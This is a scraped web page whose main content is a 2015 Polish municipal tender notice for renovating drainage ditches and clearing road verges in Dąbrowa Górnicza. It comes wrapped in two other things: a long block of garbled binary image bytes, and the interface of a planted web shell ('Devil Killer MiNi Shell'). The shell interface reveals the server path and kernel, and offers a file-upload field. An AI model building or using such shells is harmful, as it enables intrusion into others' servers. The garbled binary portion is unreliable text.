JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150211/18367-N-2015.html

<p class="kh_header"><b>Dąbrowa Górnicza: Renowacja rowów odwadniających oraz zbieranie nadmiarów ziemi z poboczy dróg na terenie Gminy Dąbrowa Górnicza</b><br>
<b>Numer ogłoszenia: 18367 - 2015; data zamieszczenia: 11.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Renowacja rowów odwadniających oraz zbieranie nadmiarów ziemi z poboczy dróg na terenie Gminy Dąbrowa Górnicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia o wartości poniżej 5.186.000 euro.
1. Opis przedmiotu zamówienia:
1.1. Przedmiot zamówienia został określony w przedmiarze robót oraz Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych i w jego zakres wchodzi: 
- czyszczenie rowów wraz z ich profilowaniem,
- umacnianie dna i skarp rowów oraz remont umocnień,
- utrzymanie rowów (koszenie traw, karczowanie drzew i krzewów),
- czyszczenie poboczy,
- utrzymanie poboczy (ścinanie poboczy, umocnienie poboczy),
- czyszczenie przepustów z namułu,
- wykonywanie przepustów rurowych wraz ze ściankami czołowymi pod zjazdami,
- wykonanie włączeń do kanalizacji.

2.  Wymagania organizacyjne:
2.1.	Przed rozpoczęciem robót drogowych uzyskać od Zarządcy Drogi tj. Wydziału Komunikacji i Drogownictwa tutejszego Urzędu decyzję administracyjną  na  zajęcie pasa drogowego zgodnie z wymogami Ustawy z dnia 21 marca 1985 roku o drogach publicznych  ( tekst jednolity Dz. U. z 2013r., poz. 260 z późniejszymi zmianami) - wraz z zatwierdzoną organizacją ruchu na czas prowadzenia robót. Zajęcie pasa drogowego nie podlega opłacie.
2.2. Opracowanie projektów zmiany organizacji  ruchu na czas trwania robót.
2.3. Oznakowanie i bieżące utrzymanie zmiany organizacji ruchu na czas trwania robót oraz przywrócenie oznakowania do stanu pierwotnego.
2.4. Pełną obsługę geodezyjną w zakresie wznowienia granic geodezyjnych planowanych prac, takich jak odtworzenie rowów odwadniających itp. oraz koniecznych pomiarów geodezyjnych dla celów prawidłowej realizacji przedmiotu zamówienia, inwentaryzacji powykonawczej wraz z naniesieniem zmian  na mapie zasadniczej gminy, załączając do odbioru końcowego inwentaryzację zabudowanych obiektów, urządzeń podziemnych itp.  - jeśli Zamawiający będzie wymagał.
2.5. Składowanie odpadów budowlanych Wykonawca zobowiązany jest zapewnić we własnym zakresie na składowiskach posiadających zezwolenie na przyjmowanie i utylizację wszelkich odpadów powstałych w trakcie realizacji zamówienia. Zamawiający nie gwarantuje istnienia takiego składowiska na terenie gminy Dąbrowa Górnicza.
2.6. Zlecanie nadzorów branżowych użytkownikom istniejącego uzbrojenia terenu w związku z prowadzonymi robotami.
2.7.	Uzgodnienia branżowe uzbrojenia podziemnego i naziemnego z ich właścicielami użytkownikami, jeśli  w trakcie realizacji  robót  wystąpi  taka potrzeba.
2.8.	O ile wystąpi taka konieczność, realizować przedmiot zamówienia również na wydłużonej zmianie i w godzinach nocnych.
2.9. Uczestniczenie w wizjach lokalnych z Zamawiającym w rozpatrywaniu wniosków i petycji mieszkańców, Radnych Rady Miejskiej dotyczących zagadnień przedmiotu umowy.
2.10.	Opracowywanie uproszczonych  rysunków  wykonawczych 
2.11.	Składowanie materiałów pochodzących z rozbiórki i nadających się do ponownego wbudowania na zapleczu wykonawcy robót - zgodnie z Poleceniem Służbowym nr WAP.II-0158-B-15/08 Prezydenta Miasta z dnia 30.05.2008 r.- załącznik nr 9 do SIWZ. Do obowiązków Wykonawcy należy: sporządzanie protokołu z odzyskanych materiałów, składowanie materiałów na paletach, prowadzenie ewidencji zdawczo odbiorczej, rozliczanie się z materiałów pochodzących z rozbiórek z Zamawiającym. 
2.12.	W czasie realizacji przedmiotu umowy utrzymywanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwania na bieżąco wszelkie odpady i zbędne materiały
2.13.	Na żądanie Zamawiającego wykonać wstępną kalkulację  dla zakresów przewidywanych do realizacji.

3.   Roboty należy zrealizować na podstawie :  
3.1.	dokumentacji technicznej i przedmiarów robót  
3.2.	Specyfikacji Technicznej Wykonania i Odbioru Robót 
3.3.	wymogów Specyfikacji Istotnych Warunków Zamówienia wraz z projektem umowy 
3.4.	zasad wiedzy technicznej, sztuki budowlanej i przepisów prawa.

4.  Zamówienie musi być realizowane zgodnie z:
4.1.	Ustawą z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2013r., poz. 1409 z późn. zm.);
4.2.	Ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tekst jednolity Dz. U. z 2012r.,poz.  1137  z późn. zm. );
4.3.	Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (tekst jednolity Dz. U. z 2003r., Nr 169, poz. 1650 z późn. zm.).
5.   Rozwiązania równoważne:
Wskazane w SIWZ znaki towarowe, patenty i miejsce pochodzenia są uzasadnione specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie jakości i parametrów przedmiotu zamówienia z uwagi na brak innych dostatecznie dokładnych określeń, które pozwalałyby opisać przedmiot zamówienia w tej części   w sposób jednoznaczny i wyczerpujący. 
W związku z powyższym Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ - zgodnie z art. 30 ust. 4 i 5 Ustawy.     
W związku z tym :
a)	Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych - tj. o parametrach technicznych i jakościowych nie gorszych niż określone w SIWZ - w odniesieniu do materiałów i urządzeń, których pochodzenie zostało określone przez Zamawiającego w SIWZ nazwą producenta.
b)	Zgodnie z art. 30 ust. 5 Ustawy Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez  niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego. Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych ma w szczególności gwarantować realizację robót w zgodzie z dokumentacją techniczną oraz zapewnić uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ.

6. Gwarancja i rękojmia
6.1.	Na przedmiot niniejszego zamówienia ustala się 24 miesięczny okres gwarancji jakości, licząc od dnia zatwierdzenia protokołu odbioru technicznego robót na zasadach określonych  w § 6 ust. 4 projektu umowy. W ramach gwarancji Wykonawca zobowiązany będzie usunąć wynikłe usterki nieodpłatnie, w tym zobowiązany jest do nieodpłatnej wymiany wadliwych materiałów na które udzielił gwarancji.
6.2.	Z uwagi na to, że w pasie drogowym wykonywane były w latach poprzednich tego rodzaju prace, to w przypadku sporu o nieprawidłowe wykonanie, Wykonawca zobowiązany jest udowodnić, że dane uszkodzenie nie powstało w miejscu wykonanej przez niego roboty budowlanej objętej gwarancją (oznaczenia, filmowanie, zdjęcia, itp.).
6.3.	Na wykonane roboty Wykonawca udziela  rękojmi na okres 24 miesięczny  licząc od dnia zatwierdzenia protokołu odbioru technicznego robót na zasadach określonych  w § 6 ust. 4 umowy.

7.  Ubezpieczenie od odpowiedzialności cywilnej
7.1.	Wykonawca w okresie realizacji przedmiotu umowy musi posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę niż nie mniejszą niż 2.000.000,00 zł (słownie: dwa  miliony złotych). Nie później niż w ostatnim dniu ważności ubezpieczenia Wykonawca przedstawi Zamawiającemu kopię polisy lub innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o przedłużonym terminie ważności.
7.2.	Wykonawca zobowiązuje się do posiadania nieprzerwanej ochrony ubezpieczeniowej w całym okresie obowiązywania umowy.
7.3.	W przypadku zmiany terminu obowiązywania umowy Wykonawca zobowiązany jest przedłużyć ważność ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności do dnia obowiązywania umowy.

8.   W przypadku zatrudnienia przez Wykonawcę personelu obcojęzycznego, 
Wykonawca zapewni ciągłą możliwość porozumiewania się personelu Zamawiającego z personelem Wykonawcy w języku polskim. 

9.    Aspekt ekologiczny: 
Podwyższone wymagania dotyczące wpływu zamówienia na środowisko postawione w ramach dążenia do wysokich standardów ekologicznych za pomocą zielonych zamówień publicznych znalazły swój wyraz w warunku udziału w postępowaniu określonym  w pkt. 8.1.3. SIWZ w zakresie dysponowania odpowiednim potencjałem technicznym. Zamawiający w treści pkt jw. wprowadził wymóg, aby min. 2 sztuki samochodów ciężarowych o ładowności min. 5 t-  muszą spełniać normę emisji spalin EURO 5.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt. 6 Ustawy do wysokości 50% wartości zamówienia podstawowego. 
2. Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym  przedmiotem zamówienia i określonym kodami CPV</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5, 45.10.00.00-8, 45.11.00.00-1, 45.11.10.00-8, 45.11.20.00-5, 45.20.00.00-9, 71.25.00.00-5, 71.35.20.00-0, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości  100 000,00 zł (słownie: sto tysięcy złotych) w formach określonych w art. 45 ust. 6 Ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert ,a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, Wykonawca wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy              i doświadczenia. Przez zakres niezbędny do wykazania spełniania warunku wiedzy i doświadczenia rozumieć należy wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowe ukończenie co najmniej 2 roboty          o wartości minimum 700.000,00 zł brutto każda polegające na renowacji rowów odwadniających. 
                Uwagi: 
1. Jeżeli zakres robót przedstawionych w dokumencie złożonym na  potwierdzenie, że roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej   i prawidłowo  ukończone jest szerszy od powyżej określonego przez Zamawiającego należy  w wykazie robót budowlanych podać wartość robót odpowiadających zakresowi przedmiotu zamówienia.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym ogłoszenie             o niniejszym postępowaniu zostało zamieszczone w Biuletynie Zamówień Publicznych.
3. W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać udział tych podmiotów w wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że  dysponuje potencjałem technicznymi jak niżej: 
1.	koparko-ładowarka	min. 2 sztuki 
2.	zagęszczarka	min. 2 sztuki
3.	sprężarka  przewoźna	min. 1 sztuka
4.	samochód ciężarowy o ładowności min. 5 t spełniający  normę emisji spalin   EURO 5.	min. 2 sztuki</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że  dysponuje osobami zdolnymi do wykonania zamówienia tj. 
1. dozorem technicznym, posiadającym minimum 3 letnie doświadczenie zawodowe, tj. 
1.1.	jedną osobą przeznaczoną do pełnienia funkcji kierownika budowy  posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej zgodnie  z ustawą z dnia  7 lipca 1994r. Prawo budowlane (Dz. U. z 2013r. poz. 1409 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane 
1.2.	jedną osobą przeznaczoną do pełnienia funkcji kierownika robót  z uprawnieniami do kierowania robotami  w specjalności instalacyjnej w  zakresie sieci, instalacji i urządzeń, wodociągowych i kanalizacyjnych zgodnie  z ustawą z dnia  7 lipca 1994r. Prawo budowlane  ( Dz. U. z 2013r. poz. 1409 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane.
Zamawiający dopuszcza jednego kierownika budowy i robót w przypadku posiadania przez jedną osobę obydwu uprawnień.  
2.	co najmniej jedną osobą uprawnioną do kierowania ruchem drogowym podczas wykonywania robót drogowych przeszkoloną przez Wojewódzki Ośrodek Ruchu Drogowego 
3.	trzema brygadami wykonawczymi (jedna brygada to minimum sześciu robotników + brygadzista). W każdej brygadzie winna być minimum jedna osoba  przeszkolona przez Wojewódzki Ośrodek Ruchu Drogowego do kierowania ruchem podczas wykonywania robót drogowych. We  wszystkich  brygadach łącznie winni być operatorzy sprzętu i kierowcy w ilościach  minimalnych wyszczególnionych poniżej: 
1.	Operator koparko-ładowarki - 2 osoby,
2.	Operator zagęszczarki - 2 osoby,
3.	Operator sprężarki przewoźnej - 1 osoba, 
4.	Kierowca samochodu ciężarowego o ładowności min. 5 t - 2 osoby.        
Uwaga: Wykonawca może przypisać tego samego operatora do obsługi więcej niż jednej jednostki sprzętowej, jeśli dany operator takie uprawnienia posiada. Dopuszczalne jest także łączenie funkcji operatora sprzętu i uprawnień do kierowania ruchem podczas wykonywania robót drogowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 2 000 000,00 zł lub dla walut obcych na kwotę w wysokości równoważnej liczonej według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o niniejszym zamówieniu w BZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy robót budowlanych pozwalających wykazać, iż Wykonawca spełnia warunek określony w pkt. 8.1.2. SIWZ.  W wykazie nie należy podawać informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2);</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. kosztorys ofertowy wykonany metodą uproszczoną, polegającą na obliczeniu wartości kosztorysowej robót objętych przedmiarem jako sumy iloczynów ilości jednostek przedmiarowych robót i ich cen jednostkowych bez podatku od towarów i usług; 
3. potwierdzenie wniesienia wadium;
4.pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
